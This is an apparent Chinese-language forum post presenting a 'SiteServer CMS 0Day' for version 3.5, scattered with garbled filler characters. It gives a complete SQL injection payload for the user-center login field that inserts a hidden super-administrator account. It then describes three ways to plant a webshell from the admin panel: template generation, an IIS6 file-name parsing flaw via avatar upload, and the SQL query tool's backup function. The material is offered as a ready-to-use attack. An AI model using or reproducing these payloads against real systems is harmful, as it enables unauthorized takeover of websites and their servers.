SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

6 G( c" K5 g# e4 n  ^. b- n" Gstieserver官网:www.siteserver.cn


  y& j0 F3 I, L% w$ U( ~
! x* J( w% d& MEXP:
2 \$ S" v# p: g
直接访问UserCenter/login.aspx



用户名处输入：
2 T% {7 m' G& Z4 r$ J
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


2 @  {6 P: C) Y5 j3 W
9 H4 m* i( T/ N1 y密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
- q$ l3 ^/ }  D. i
, J' L( v0 L) I) v# }
" \- d9 n- y. ]8 B
之后再访问后台SiteServer/login.aspx用插入的用户登陆

- v6 u- F4 \4 V7 Z1 Y7 N8 N: g3 {

3 ~0 l; L' Q5 A后台拿webshell的三种方法：

5 O! R* |! q- e" d一、
8 y# \/ B7 k' i
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
/ [% ^$ X9 p& q  x( f% [/ y
! F" i" W: p# z8 O# [8 Y, k8 q/ O0 B二、

+ n6 d: |$ E; S0 @成员权限-》添加用户-》用户名为：1.asp
1 T( V+ E/ s+ |( y) Z. H, @
8 D) G; k; r9 r; Z& f. _; \; Chttp://127.0.0.1/usercenter/

1 g5 A& h* ]# \6 g3 o* U1 o用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

  W& Q) t! l- n3 d2 _" F（ps：后台添加用户时不会验证是否含有非法字符）
, h, ]# U: r3 H
5 Q& _0 j0 c( B% {: o* O三、
# S# c( y; J/ G( F7 e: J! j
. d2 \# D8 N8 Y系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
5 n4 {/ z! S/ u- u5 E
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。